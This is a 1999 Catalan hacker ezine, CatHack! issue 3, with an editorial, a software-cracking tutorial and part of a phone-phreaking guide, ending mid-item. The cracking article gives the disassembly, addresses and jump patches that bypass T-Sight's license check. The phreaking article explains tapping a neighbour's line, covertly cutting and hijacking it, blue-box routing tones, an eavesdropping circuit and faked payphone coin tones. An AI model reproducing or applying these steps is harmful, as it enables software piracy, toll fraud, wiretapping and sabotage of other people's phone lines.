Copy Link
Add to Bookmark
Report
CatHack Issue 3
.----------------------------------------------------------------------------.
| &&&& &&&&&& && && && &&&&&& &&&& && && &&&&& |
| && && &&&&&& && && && && && & &&&& && && |
| && && && && && && && && & &&&& && |
| && &&&&&&& && &&&&&&& &&&&&&& && &&&&& && && |
| && && && && && && && && && && && && && |
| &&&& &&&&& &&& && && &&&&& &&&& && && && &&&&& |
&****************************************************************************&
* *
* CatHack! #03 | Desembre 1999 | welcome.to/cathack | cathack.itgo.com *
* *
&****************************************************************************&
| S'esta preparant algo gros!... la CON-Cat |
|----------------------------------------------------------------------------|
| Membres: |
| > PGB < pecuy@ilimit.com > BaRner < barner@iname.com > |
| QUiCKSHOT < 12389csb@comb.es > Pop.tPH < poptph@hotmail.com > |
| LopeHack <st05764@salleURL.edu> Brainstorm <brainstorm@redestb.es> |
| KL4RK < kl4rk@clerk.com > Kuduk < kuduk@lettera.net > |
| d0Nner < dONner@isuisse.com > Asac-Cat < txetxe@softhome.net > |
| Acastan < acastan@pie.xtec.es > [hansi] < msvmsv@ctv.es > |
| |
| Salutacions a: |
| > _2Tone - Rubeneikers - LoBo - RareTeam - #cathack - Pinto - SDG |
| MuniX - Radios lliures - VanHell - jaink0a - Kabron - ... |
| |
`----------------------------------------------------------------------------'
.........................................................................
[ No ens fem responsable del mal us i el dany que ]
[ es pugui fer amb la informació aqui continguda ]
'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Pau entre pobles
Guerra entre clases!
.---[ Index ]---.____________________________________________________________
| |
| Nom Tema Autor Id. |
| -------------------------------------------------------------------------- |
| Editorial opinió cathack 01 |
| Cracking T-Sight cracking KL4RK 02 |
| Boxing!!! phreaking Pop.tPH 03 |
| Con-CatHack! (proposta) opinió (kdd) BaRner 04 |
| Hackejar w95/98 amb accés físic hack Acastan 05 |
| popLOOP bug hack Pop.tPH 06 |
| La conciencia d'un Hacker(the Mentor) opinió Brainstorm 07 |
| Collint informació hack Pop.tPH 08 |
| Humor opinió cathack 09 |
| Notícies opinió BaRner 0A |
| Acomiadament opinió cathack 0B |
| |
| *Quan parlem de l'autor cathack, parlem de tot el grup |
`----------------------------------------------------------------------------'
(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
[01]
____________________________________
/ / /
> EDITORIAL: > (
\______________\____________________\
Bones lectors!
Com veieu ja ens hem anat agafant bastant traça amb aixo de fer la revista :)
Pero ens falten col·laboradors! animeu-vos! escribiu textes i envieu-los a
poptph@hotmail.com i mirarem de possar-los on sigui...Esperem que l'any 2000
el comencem amb més bon peu que el 99 i la gent s'animi una mica mes. Per cert
els textes han d'estar escrits tal com ho indiquem al final de la revista.
Si, son moltes coses, pero aixi ho podrem llegir tots bé. :)
La CON-Cat ja la tenim quasi quasi acabada de determinar, no només estarem
els del grup sino molta més gent de barna (i d'ebre enllà) també mogudes pel
coneixement que es reuniran totes en un lokal (de 100m2 (en principi)) cadascu
amb el seu ordinador, muntar una gran xarxa i practicar, aprendre i ensenyar!
Ens currarem un CD (ch!CD) amb utilitats, textes, revistes, xploits, de tot
(i en quantitat) per un modic preu per l'autogesti¢ del grup. El preu de
l'entrada no creiem que sobrepasi les 1000peles (el lloguer del telèfon i
el lokal). Ens queda determinar encara els dos dies d'estiu i el lloc on es
realitzarà la trobada, pero tranquils que us assabentareu.
Que més?... a si! hem obert obert un subdomini a itgo, cathack.itgo.com poc
a poc l'anirem omplint amb la pàgina nova i utilitats noves (intentarem que
siguin en CGI per hackejar desde wib cgi-telnet?).- Programar i programar,
aixo hem de fer, pero encara no tenim gaire temps per fer res...merda
d'educació :(
Com haureu notat hem tingut bastants nous membres, que sembla que en dominen
gaire sobre el tema (basicament programació, electrònica i hacking a win) si,
ja sé que em deixo moltes coses!- pero tranquils que ja ho anireu demostrant
(a la llista o a la ezine).
Per cert, hem tingut alguns problemes a l'irc, desagradables nazis que s'han
colat a #cathack i s'han dedicat a muntar bronka. Doncs bé, sapigueu que
#cathack segueix funcionant, en aquest canal serà sobre la gent que hi pasi
i punt, el nostre es indefinit i té password. :(
Esperem que us agradi aquesta tercera edició i recordar-vos que RULI! mireu
de passar la revista a tothom que conegueu que li interesi (excepte monos!!)
i esperem correspondencia vostre!
PD: Feu trashing (remeneu els contenidors) jo vaig trobar un 486DX4 a 100 i
un monitor de 15" digital xD!!
I recordeu: NO ROBEU, ELS GOVERNS ODIEN LA COMPETENCIA
>poptph@hotmail.com<
> CatHack! <
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
[02]
<------------------------->
|CRACKING T-SIGHT by KL4RK|
<------------------------->
***
Aquest crack està explicat per simplement millorar els coneixements
d'assembler i mostrar com funciona una rutina molt simple de protecció.
Si creus que aquest software és bo, registra't legalment com a propietari
i hi sortireu guanyant tu i el programador, que ha fet un gran esforç per
produir aquest software.
NO ENCORATJO NINGÚ A UTILITZAR VERSIONS CRACKEJADES DE PROGRAMES.
COMPRENGUEU QUE AQUEST TEXT NOMÉS VOL TRANSMETRE UNS CONEIXEMENTS
QUE APLICATS PODEN DUR A LA IL·LEGALITAT. El que feu amb el
coneixement es EL VOSTRE PROBLEMA!
***
-Programa: T-SIGHT Analysis 1.1 by EnGarde (www.engarde.com)
-Tipus de protecció: Cutre, cutre. Es basa en un codi hex generat,
que depèn de les ips que permet utilitzar el programa.
-Tipus de Crack: Patch. Destrueix la rutina de comprovació. Per cert,
poc elegant, però caram, jo tampoc no en sé gaire...
-Eines necessàries:
un disassembler (W32Dasm89, feu un ftp-search W32DASM98.ZIP)
Editor HEX (HIEW, Hacker's vIEW: busqueu una versió decent, la meva
és la 6.01 i va PERFECTE!)
Opcional: debugger, SoftICE, l'eina imprescindible per gairebé
qualsevol crack, malgrat aquest no és el cas. Per cert
que costa una mica de trobar.
-DIFICULTAT DEL CRACK: MOOOOOLT FÀCIL [tant, que jo he pogut :-) ]
------------
Introducció.
------------
En moltes pàgines web dedicades a la seguretat informàtica surt un programa
per win anomenat T-Sight, de EnGarde (www.engarde.com) entre d'altres tan
famosos com SATAN o Nessus.
Picat per la curiositat, doncs vaig decidir baixar-me'l i veure q tal. I bé,
vaig comprovar amb una desagradable sorpresa que no podia ni tan sols
evaluar-lo, no anava de cap de les maneres. No vaig trobar enlloc cap crack
pel programa que em permetés evaluar-lo, i vaig decidir provar-ho jo mateix.
Però deixem-ho estar que això no crec q us importi gaire xDDDD
---------
Approach!
---------
El programa consta de dos executables, el tsanlsys.exe i tsrltime.exe.
Comencem pel tsanlsys.exe. Només iniciar-se mostra una pantalla d'on no
podem passar on demana IP, netmask i lisence #.
--T-Sight: Licensing----------------------------
| The following IPs are Licensed/Internal: |
| //////////////////////////////////////////// |
| / / |
| / / |
| / / |
| //////////////////////////////////////////// |
| |
|- Edit-----------------------------------------|
| -IP: __________________ |
| -Netmask: _______________ |
| *ADD* *MODIFY* *DELETE* |
|-----------------------------------------------|
| License #: __________________ *VERIFY* |
| Lincense Unverifyed |
|-----------------------------------------------|
| *OK* *CANCEL* *HELP* |
-------------------------------------------------
Si entres una IP poc restrictiva, com ara 0.0.0.0 :-) i proves un número de
codi a boleo:
a) Si el codi no és Hexadecimal, el refusa (amablement informa de la raó,
quin programador més ingenu xDDDD)
b) Si el codi és mes gran de 8 xifres, el refusa: Overflow (quin
programador més estúpid)
c) Si el codi és incorrecte, on diu "license unverifyed" i diu "License
invalid" (res a dir)
OK, OK....
Primer que res, provem de trobar la rutina de protecció del programa. Per
això, carreguem el soft-ice, executem el programa i entrem un codi qualsevol,
fem un CTRL+D, i al soft-ice probem diferents BPXs: bpx GetDlgItemText,
GetWindowText, GetDlgItemTextA. OK, aquest últim funciona, però abans de
provar res més, pq no ho passem al disassembler?
Obrim el w32dsm89.exe, i carreguem el programa. Perfecte. Ara què? Doncs un
primer pas seria mirar i buscar als "String References" el "License Invalid"
que tan poc ens agrada. Bé, perfecte, allà hi surt. Doble clic sobre el
string, i som en una pantalla que es veu així:
* Possible StringData Ref from Data Obj ->"License Invalid"
:0042B944 68C45F4600 push 00465FC4
bla bla bla bla........
Molt bé, molt bé, aquí és on ens trobarem un cop el programa ja hagi decidit
que el nostre license number no és bo... Doncs mirem més amunt, a veure si
descobrim des d'on ve el programa i on és la rutina de comprovació. Mirem una
mica amunt, i dues linies a sobre veiem:
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0042B921(C)
|
Val, aquí hi arriba des de 0042B921, salt condicional.... tirem més amunt, fins a 0042B921
i veiem tot això: (...)
* Reference To: USER32.GetDlgItem, Ord:00F3h
:0042B8ED FF1544075600 Call dword ptr [00560744]
:0042B8F3 50 push eax
* Reference To: USER32.EnableWindow, Ord:00B2h
:0042B8F4 FF1524075600 Call dword ptr [00560724]
:0042B8FA 684C464900 push 0049464C
:0042B8FF 8B0D8C5E4600 mov ecx, dword ptr [00465E8C]
:0042B905 51 push ecx
:0042B906 E8261A0000 call 0042D331
:0042B90B 83C408 add esp, 00000008
:0042B90E 8945A8 mov dword ptr [ebp-58], eax
:0042B911 8B55A8 mov edx, dword ptr [ebp-58]
:0042B914 8955A4 mov dword ptr [ebp-5C], edx
:0042B917 837DA4FE cmp dword ptr [ebp-5C], FFFFFFFE
:0042B91B 7411 je 0042B92E
:0042B91D 837DA4FF cmp dword ptr [ebp-5C], FFFFFFFF
:0042B921 7421 je 0042B944
:0042B923 837DA400 cmp dword ptr [ebp-5C], 00000000
:0042B927 7431 je 0042B95A
:0042B929 E984000000 jmp 0042B9B2
* INCÍS *********************************************************************
Recordem, el SoftICE saltava quan feiem un BPX GetDlgItemTextA, o sigui que
aquest call ha de sortir per algun lloc. Efectivament, si mirem força més
amunt trobem
* Reference To: USER32.GetDlgItemTextA, Ord:00F5h
|
:0042B860 FF1520075600 Call dword ptr [00560720]
:0042B866 8D55B0 lea edx, dword ptr [ebp-50]
:0042B869 8955AC mov dword ptr [ebp-54], edx
:0042B86C EB09 jmp 0042B877
(...)
Des d'on s'arriba al tros de codi on som.
*****************************************************************************
Bàsicament, sabem que des de :0042B921 salta a la part de codi on NO VOLEM
arribar. Però no avancem fets....Analitzem el codi, i anem mirant on porten
els salts condicionals i no condicionals:
----> :0042B91B 7411 je 0042B92E
Aquesta linia ens duu si es produeix el salt a un lloc com aquest:
* Possible StringData Ref from Data Obj ->"Demo License Expired"
:0042B92E 68AC5F4600 push 00465FAC
O sigui que no volem que hi vagi a parar.
----> :0042B921 7421 je 0042B944
Aquesta duria a:
* Possible StringData Ref from Data Obj ->"License Invalid"
:0042B944 68C45F4600 push 00465FC4
Tampoc volem que hi salti....
----> :0042B927 7431 je 0042B95A
Aquesta és la bona. Es veu i CLARAMENT:
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0042B927(C)
|
:0042B95A 833D4C46490000 cmp dword ptr [0049464C], 00000000
:0042B961 7513 jne 0042B976
* Possible StringData Ref from Data Obj ->"Registered for Networks Above"
:0042B963 68D45F4600 push 00465FD4
Okay, abans de pensar en aquest codi, continuem analitzant els salts on erem:
----> :0042B929 E984000000 jmp 0042B9B2
L'ultim salt, l'obligatori, el qual ens porta a
:0042B9B2 8B55A8 mov edx, dword ptr [ebp-58]
:0042B9B5 52 push edx
* Possible StringData Ref from Data Obj ->"Demo: %d days left"
|
:0042B9B6 6814604600 push 00466014
Ja es veu que no ens interessa.
Resumim, que sempre aclareix les idees:
-Salt 0042B91B: Deme License Expired. (NO)
-Salt 0042B921: License invalid. (NO)
-Salt 0042B927: ----És el bo!---- ->(SI)<-
-Salt 0042B929: Demo version. (NO)
Total, que el salt de 0042B927 és el que volem que agafi, ja que els altres
no porten enlloc.
Un cop aclarides les idees, continuem analitzant el codi on anem a parar
quan es produeix el salt 0042B927, és a dir, el salt que volem q es produeixi:
* Referenced by a (U)nconditional or (C)onditional Jump at Address:
|:0042B927(C)
|
:0042B95A 833D4C46490000 cmp dword ptr [0049464C], 00000000
:0042B961 7513 jne 0042B976
* Possible StringData Ref from Data Obj ->"Registered for Networks Above"
|
:0042B963 68D45F4600 push 00465FD4
EUREKA!! Perfecte, ara ja sabem que, un cop aquí, si no es produeix el salt
de 0042B961, el programa actuarà com si el codi entrat fos correcte.
RECAPITULEM:
-Salt 0042B91B: NO EL VOLEM (condicional)
-Salt 0042B921: NO EL VOLEM (condicional)
-Salt 0042B927: SI!!!!! (condicional)
-Salt 0042B961: NO EL VOLEM (condicional)
-Salt 0042B929: NO EL VOLEM. (obligatori: jmp)
---------
El Crack!
---------
Arribat aquest punt, ja no ens hem de trencar més el cap. Sabem quins salts
volem agafar i quins no. Anem al disassembler, i fem un CTRL+L (load).
Aleshores, tranquilament anem aplicant patches (que només són temporals) al
programa:
***PATCH: Anem a 0042B91B, Patch Code, el canviem per dos Nops.
***PATCH: Anem a 0042B921, Patch Code, el canviem per dos Nops.
Ara ja hem aconseguit que el prog no faci els salts q no volem. I ara què?
Doncs hem d'obligar el programa a que vagi a 0042B95A. Què podem fer?
Recordem on som:
:0042B927 7431 je 0042B95A
:0042B929 E984000000 jmp 0042B9B2
Podem canviar el salt condicional per un salt obligatori, però a l'hora de
fer el patch això és un cacau i ens podem embolicar (proveu-ho i sabreu de q
parlo) És més fàcil agafar el segon salt, el de 0042B929 i canviar-lo, en
lloc de que salti a 0042B9B2 doncs que faci un jmp 0042B95A. Així la cosa
quedarà
--="Antes"=-- -="Despues"=-
(0042B927) je 0042B95A -> je 0042B95A
(0042B929) jmp 0042B9B2 -> jmp 0042B95A
O sigui que tant si com no el programa saltarà allà on volem.
***PATCH: Anem a 0042B929, Patch Code, el canviem per jmp 0042B95A.
i finalment, l'últim salt, q no volem q faci:
***PATCH: Anem a 0042B961, Patch Code, el canviem per dos Nops.
Val, ara ja tenim tots els patches aplicats, i ara ja podem comprovar si son
efectius. Fem run (F9) i a veure q passa. De moment, tot normal. Afegim una
ip, 0.0.0.0 per exemple, a veure q passa... afegim el codi com ara "CRACKED
BY KL4RK" ;) i...
--T-Sight: Licensing----------------------------
| The following IPs are Licensed/Internal: |
| //////////////////////////////////////////// |
| / 0.0.0.0 / |
| / / |
| / / |
| //////////////////////////////////////////// |
| |
|- Edit-----------------------------------------|
| -IP: __________________ |
| -Netmask: _______________ |
| *ADD* *MODIFY* *DELETE* |
|-----------------------------------------------|
| License #: CRACKED BY KL4RK *VERIFY* |
| Registered for networks above |
|-----------------------------------------------|
| *OK* *CANCEL* *HELP* |
-------------------------------------------------
EUREKA!!! CRACKEJAT!
Ara ja sabem que el crack és bo... només falta aplicar un patch amb un editor
hexadecimal, com ara el HIEW, i anar fent aquests canvis....
Un anàlisi més detallat del codi ens mostra que només cal aplicar patches a
0042B927 i a 0042B921....
---------
Conclusió
---------
I ara ja tenim un executable crackejat. Ara, és clar, falta crackar l'altre,
però... com és de suposar, la ruina és clavada, la mateixa, amb els numeros
canviats. Si heu entès aquest crack, aleshores sabreu fer l'altra part....
Això us ho deixo per vosaltres, fins que apareixi la segona part de CRACKING
T-SIGHT by KL4RK! (si apareix xDDDD)
!!
(per cert: l'altre executable funciona UNICAMENT sota win NT! Quan està
crackejat, comença amb el missatge "FATAL: Can't initialize packet filter" i
surt.)
!!
Salut i bon CrackinG!
----->>KL4RK<<-----
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
[03]
>=<-------------------------->=<
>=< BOXING!!! >=<
>=< >=<
>=< per Pop.tPH >=<
>=<-------------------------->=<
INTRO:
~~~~~~
Que es el phreaking? El phreaking es un art, tal com pot ser-ho el hacking
pero centrat en les linies telefoniques i centraletes , que pot portar a
diverses finalitats, entre elles trucar de franc, molts phreakers acaven
derivant al hacking.
Una de les moltes formes, que pren el phreaking son les boxes (caixes), que
són unes caixes (en alguns casos no son ni caixes) que s'intercalen als fils
telefonics per aconseguir alguna cosa concreta.
NOTA: molts trucs de phreaking corren per la xarxa i acaven sent llegits per
lamers que nomes volen conseguir fer quatre coses per impressionar els amics
i punt, doncs NO!, es necessita una base, i coneixer tot el funcionament de
les linies telefòniques.
Funcionament de les linies telefòniques:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Les linies telefoniques estan formades per 4 fils. Encara que nomes utilitzem
2 fils, els altres dos serien per una segona linea. La funcio dels fils varia
depenent del pais. (per normes)
> EXPANYA < > EEUU <
color funcio color funcio
--------------------------------- ---------------------------------
VERD linea1 ROIG linea1
MARRO FOSC linea2 VERD linea1
BLANC linea2 GROC linea2
ROIG linea1 BLANC linea2
cal tenir en compte aixo: els colors poden variar i la funcio tb. Els dos fils
de cada linea son diguessim una pila, en cada fil hi ha un pol (+ i -). I la
tensio varia depenent de l'estat del telefon:
./ penjat 1 Mante una tensio molt baixa
./ despenjat 2 Te prou tensio pel micro i l'spkr pero no gaire diferent
./ trucant 4 El timbre ha de sonar i necessita mes tensio
./ parlant 3 Necessita prou tensió per alimentar el micro i l'speaker
En cada un dels estats hi ha una tensio diferent, per superar la resistencia
dels elements conectats i fer que funcionin. Al costat de cada estat he ficat
un nombre representatiu de la proporcio de tensio que hi ha. Us faig un petit
esquema sobre el funcionament d'un telefon:
.-------------------.
|>-+--. | |> = altaveu |
| | | |) = microfon |
|)-+ | | /. = interruptor |
|/.|__timbre__ | ^ = linea |
| | `-------------------'
+--/.---------+
| marcador | <<-- Si, ja se que esta molt mal fet i no rula
^ ^ pero es un exemple com qualsevol altre.
El primer interruptor de dalt seria el boto de penjar. Amb ell activariem i
desactivariem el timbre (pq no sones quan esta despenjat) despres necessitem
un altre interruptor que faci un curtcircuit entre els dos fils (+i-), amb
aquest curtcircuit el que fem es marcar amb impulsos. Si no, probeu de trucar
algun numero de telefon amb el boto de penjar, es pot.
Un cop marcat els 10 nombres necessaris per establir una conexio (a ecspanya)
la centraleta ens dirigeix la trucada a un altre telefon i crea un circuit
tancat, llavors deixa una tensio fixa fins que penja qui ha trucat o porta el
qui ha rebut la trucada un temps amb el telefon penjat.
Ara amb les linies i telefons digitals la vigilancia i control del germà gran
sobre les nostres trucades es molt mes bona, ja que no es centra en tensions
nomes sino tb amb tons (mescles de dos tons junts, que donen una ordre a la
centraleta).
Al haver tantes boxes, les he ordenat per ordre alfabeticonumeric (oh!), i
repartiré la informacio en 2 textes, un en cada ezine. Per cert, si sabeu
angles, podeu adonar-vos que tota aquesta informacio l'he treta de 2600
(ftp.2600.com). A mes, fare una petita definició de cada box per que us feu
una idea, pero si voleu fer-ne una heu de tenir en compte que potser falta
informacio i que en les linies de la nostra estimada (T) no funciona el mateix
que en les de Ma Bell. ( sense contar que és un delicte tocar les linies
telefòniques sense el permís necessari ) --i no es el del papa i la mama ;)
NOTA1: Jo personalment no he tingut la ocasió de probar tot el que escric a
continuacio i NO em faig responsable del dany, perjudici o
problemes que pugueu patir amb les 'forces d'ordre public'. Simplement
ho escric perque tingueu un bon coneixement del funcionament de les
linies telefoniques.
NOTA2: linies analogiques i linies digitals... que fer??? logicament analo-
giques!, les digitals ens enganxen a la primera, basicament perque
les centraletes son digitals i porten tot un control molt mes fort
que les analogiques... a mes fa poc em vaig enterar que es mes dificil
que ens puguin localitzar la trucada si marquem per impulsos, no se
per quina raó, pero es aixi.
Comencem! Avui us parlare desde l'acrylic box fins a la crimson box.
ACRYLIC BOX o BUD BOX:
Aquesta caixa consisteix en obrir la caixeta telefonica del terrat i
punxar la linea d'algun vei possant-la amb els 2 fils sobrants de la
nostra linea (en els fils telefonics hi han 4 cables, aquesta box
nomes la podrem fer si tenim una linea, ja que si en tenim 2 estaran
els dos fils restants ocupats).
Doncs be, un cop punxada haurem d'utilitzar un switch que conmuti les
dues linies, una cosa aixi:
__
Roig ------|\ | 1 |"""""""""""""""""|
Verd ------|-]|--------| |
Marro ------|-]|--------| telefon |
Blanc ------|/_| 2 |_________________|
Llavors podrem conmutar la nostra linea (1) i la del vei (2), un dels
popblemes es que a vegades ens podem trobar amb el vei parlant, i ens
poden enganxar facilment.
NOTA: Els colors poden ser diferents i fins hi tot pot canviar l'ordre
NOTA2: Aquesta box funciona amb independencia de la companyia i del
pais en que la utilitzem.
AQUA BOX:
Aquesta box va ser creada en un principi per burlar els metodes de
localitzacio de trucada de l'FBI, que consistien en enviar un voltatge
superior per la LV (linea de voltatge) per fer veure a la centraleta
que encara no havia penjat i tenir mes temps per localitzar la trucada
a mes, depenent de la tensio i de l'estona que el voltatge s'ha
aplicat a la linea poden conseguir que el telefon soni a estones
sense parar i poguessin sentir d'on venia la trucada. Aquesta tecnica
es anomenada: "LOCK IN TRACE" (bloqueig de traçada).
<POPNOTE> Hem de tenir una cosa clara. Com mes consum hi ha en una
linea menys voltatge hi ha. Aqui esta el limit de telefons en una
linea. Amb aquesta teoria podem dir que quan algu ens punxa la linea,
augmenta el consum i per consequencia baixa el voltatge. A no ser
que el voltatge el possin ells.</POPNOTE>
Doncs be, seguim, en principi, per evitar la tecnica LIT de l'FBI,
simplement ho podem aconseguir desendollant el telefon de la roseta
RJ i llestos, pero...no ho farem aixi, oi? l'aqua box consisteix
en una caixa que desvia el voltatge de la linea telefonica a un
aparell extern (com pot ser una radio, un llum, ...) per aconseguir
reduir el voltatge de la linea a 0, i fins hi tot amb una mica de
sort podem fer caure el generador de l'FBI.
BEAGON BOX O BEIGE BOX: No es justament una box, de ben cert, la beagon box es
punxar la linea d'algu de forma temporal, amb un telefon "simplet" i
unes pinces, mossegar els fils de l'altre linea, es pot fer per
escoltar trucades (bastant lleig) o per trucar de franc, pero si volem
fer aixo, hem d'anar en compte que sigui una hora en que ningu pugui
trucar, ja que si ho fes, nosaltres sortiriem en mig del dialeg i
seria bastant evident que tenen la linea punxada.
NOTA: Un bon lloc per fer beagon box, es el les cases en construccio,
ja que alla podrem trobar fils telefonics penjant, entrant de nit i
vigilant que ningu ens vegi podem fer-ho amb mes discrecio, ja que son
linies lliures, no les utilitza ningu.
NOTA2: La beige box, no es el mateix que la beagon box, pero fan la
mateixa funcio.
BLACK BOX O MUTE BOX:
La black box, es basa en la idea que la centraleta sap l'estat del
nostre telefon mitjantsant el voltatge que hi passa. Aquesta caixa
si que l'he probada i certament no funciona a les linies de (T),
aqui nomes produeix un silenci, i si truquem nosaltres la linea es
talla.
ex. TRUQUEM amb la black ->> LA LINEA ES TALLA (falta de tensio)
REBEM TRUCADA " " " ->> PRODUEIX UN SILENCI, encara que
hauria de funcionar be, pero amb un
volum una mica mes baix.
El seu esquema es basa en possar una resistencia de 1.8k a la LV
per simular que el nostre telefon segueix penjat (per mantenir la
tensio). Encara que tb podriem probar amb resistencies de diversos
valors, l'esquema seria el mateix:
DESDE >--------------------GREEN-> A
LINEA >--! 1.8k LED !---RED--> TELEFON
!--/\/\/\--!>--!
! !
------>/<-------
INTERRUPTOR
BLAST BOX: Aquesta box consisteix en possar un amplificador al microfon del
telefon per poder parlar quan la linea "sembla tallada", aquesta
tecnica tambe s'utilitza en la CLEAR BOX, que ja parlarem mes endavant
encara que a les linies nostres no podem fer gaire cosa amb aixo.
BLOTTO BOX: La blotto box, mes que una caixa seria un suicidi, NO LA UTILITZEU
MAI, la blotto box consisteix en aplicar una tensio bastant elevada
(com poden ser els 220v de casa) a la linea telefonica, fent aixo
conseguiriem cremar la nostra area (si ets de barna el 93), cremant
la centraleta i inutilitzant la linea durant bastant dies (per no dir
mesos) ja que cremariem els fils.
BLUE BOX: La mare de totes les boxes, la veritable box, encara que no funciona
a (T), funciona a Ma Bell (EEUU). Consisteix en enrutar trucades, una
forma molt bona de trucar gratuitament i anonimament. Consisteix en
quan tinguem establerta una trucada emetre un to de 2600hrtz
conseguint un mode especial de la centraleta en que haurem de trucar
amb uns tons diferents (matrix tones) seguint aquesta taula:
TECLA TONS(hz): TECLA TONS(hz):
1 700+900 7 700+1500
2 700+1100 8 900+1500
3 900+1100 9 1100+1500
4 700+1300 0 1300+1500
5 900+1300 * 700+1700
6 1100+1300 # 900+1700
Pero tenint en compte que per comensar la conexio hem de fer un to
de 1100+1700 (el anomenat KP de keep (mantenir)) i que per tallar la
conexio haurem de fer un to de 1500+1700 (ST d'stop) i per sortir de
totes les conexions (o sigui, per tornar al mode normal haurem de
fer un to de 2600hz de nou).
<POPNOTE> Aqui no funciona, que jo sapiga, ho vaig probar i no
s'aconsegueix res. Despres voldria explicar-vos una historia que va
per la xarxa i segurament no es certa, pero sempre val la pena
explicar-la a les noves generacions ;)
Diuen que un xaval d'eeuu cada nit trucava a sa mare per parlar i
despres li cantava una canso. Pero en un moment de la canso la linea
es tallava. El xicot es va comensar a preocupar pel tema i va acabar
ficat en el mon del phreaking, liderant un dels grups mes prestigiosos
de l'escena del phreaking: 2600.
Aclaracions. Qui hagi escoltat un to de 2600hz sap que es molt agut i
que es molt dificil fer-lo amb la veu humana i encara mes que surti en
una canso. Segurament no va ser tant innocentment.</POPNOTE>
BROWN BOX: Consisteix en utilitzar els dos fils restants per fer una mena
d'intranet amb la linea telefonica, i poder fer per exemple una
desviacio a un altre telefon (de la mateixa casa) que tingui posats
els altres 2 fils fent un pont entre ells.
>- exemple: -<
_________ _________
[ R------|----| TELEFON |----------------| TELEFON |
[ B------|----|_________|----------------|_________|
M------|--------|x|------------------------|x|
V------|--------|x|------------------------|x| ( x = commutador)
( [ = linea bona)
BUG-SWEEP BOX: Amb la bug-sweep box aprofitarem l'error 415-BUG-1111 de les
centraletes d'eeuu, gracies a ell podrem escoltar el que passa a
l'altre banda del telefon sense que ningu aixequi el telefon. El seu
funcionament es simple. Necessitem una pila de 9v per donar la tensio
i uns quants materials mes que podrem anar a buscar a radiowatt:
C1 10-uF condensador electrolitic 25 WDVC
C2 300-uF condensador electrolitic 25 WDVC
C3 0.1-uF condensador
C4 0.068-uF condensador
D1-D3 1N914
IC1,IC2 555 temporitzador
R1, R4-R6 1-kilohm resistencia
R2 91-kilohm resistencia
R3 22 kilohm resistencia
T1 500-to-8 ohm transformador de sortida d'audio
+9v
__________|_____________________________
| _|__|_ _|__|_ |
R1 | 4 8 | _|<D1__R3__ | 4 8 | R5
| | | | | | | |
+-----+2 3+---+ +-+5 2|--+----+----+
| | | |_>|R2__R4__| | | | |
R2 | ic1 | | | ic2 | R6 D3
| +-+6 | ___| | 6+-+ | V
| | | | | | | | | -
+---+-+7 | | +--+3 7+-+-----+----+
| |___1__| | | |___1__| |
| | | | | C4
| | | | | ^
C1 | C2 T1 _|_._C3|(_. |
^ | ^ 8--500<_|_. |
|_________|______________|__|______|__________|
|
-G-
Cada IC fa una frquencia determinada (10hz i l'altre .8hz), la box
es conecta quan llevem el telefon. Llavors truquem a un telefon que
sapiguem que no contestara ningu, llavors mentres vagi trucant, la
box fara les frequencies 3 cops cada 4 segons, despres d'aixo, el
telefon deixara de sonar i podrem escoltar el que passa a l'altre
banda del filferro.
<POPNOTE> Torno a repetir que no he tingut la ocasio de probar si
aquesta box funciona realment aqui, i si algu ho proba agrairia que
m'ho digues. I tampoc he pogut saber si utilitzant aquesta tecnica
puguem trucar de forma gratuita, ja que l'altre no despenja.</POPNOTE>
BUSY BOX: No crec que aixo mereixi la denominacio de box, pero mira, li direm
que si pq no plori el seu creador. Una busy box consisteix en obrir
la caixeta de telefon del terrat i tallar els fils de la seva linea,
pero d'una forma que no es noti gaire, llavors ell no podra ni trucar
ni rebre trucades. I a mes nosaltres podrem abusar de la seva linea
punxant-li sense cap por de que ens puguin sentir.
CONTRA: Quan ens enganxin ens podem anar preparant per una bona multa
i si som majors d'edat penes de preso i tot. Encara que ho podem fer,
sempre hi quan sigui per gastar una broma a un amic (o enemic) durant
poc temps i sense abusar de la seva linea.
CHART BOX: La chart box es...dificil de saber els seus resultats, aquesta box
serveix per aplicar nosaltres la tensio al telefon directament, enlloc
d'utilitzar la que ens dona la companyia, amb aixo tenim una cosa bona
i un altre de dolenta. Depenent de la companyia la trucada la podrem
fer o no, i ens cobraran o no. Tot depen de com sigui d'agraida la
nostra companyia telefonica. Encara, q tb ens ho podrien agrair, ja
que gastem de la nostra electricitat i no de la seva :), pero si volem
portar en practica aquesta box haurem de mirar quins son els diferents
voltatges que te la linea: quan es mante en linea, quan parlem, quan
truca i quan rebem trucada. (eeuu = 12v)
Ara si, si utilitzem aquesta box, ens lliurarem del LIT(lock in trace)
ja que la tensio que apliquin a la nostra linea es perdra pq tenim
el fil tallat i no els servira de res. ;)
Es recomenable possar un fussible a continuacio del generador. Per si
de cas ens passem amb el voltatge i cremem algo.
CHEESE BOX: tuu tuu tuu... hola!... pii.. piii... s'em acaben les monedes!
segur que hem sentit (quan ens truquen desde una cabina) uns tons,
doncs aquests tons son els tons que emiteix la cabina quan nosaltres
introduim monedes. Si conseguim grabar (a bona qualitat) aquest to
no ens fara falta possar mes monedes a la cabina. yuhuu!, pero hem
d'anar en compte que no ens vegin.
1) Per aconseguir aquest to, podem deixar a casa un "callforward",
un aparell que quan truquen despenja sol i comensa a grabar
